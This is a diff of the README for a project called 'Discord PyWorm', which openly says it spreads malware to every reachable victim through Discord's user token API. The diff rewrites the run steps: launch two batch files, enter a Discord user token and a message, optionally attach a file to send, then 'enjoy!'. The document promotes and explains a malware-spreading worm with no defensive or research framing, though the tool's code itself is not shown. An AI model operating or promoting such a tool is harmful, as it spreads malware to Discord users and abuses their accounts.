hu5o-dev/Discord-PyWorm/README.md

 # Discord PyWorm
 Spread malware to all available victims using discords user token api.

-# NOTE: pip install tkinter
-Install tkinter before running the script.

 # How to run
-1. install tkinter
+1. Run prerequsites.bat
-2. Run the bash script
+2. Run run.bat
-3. input your token and message
+3. Input your token
+4. Input your message
+5. choose whether you want to send a file
-4. enjoy!
+6. enjoy!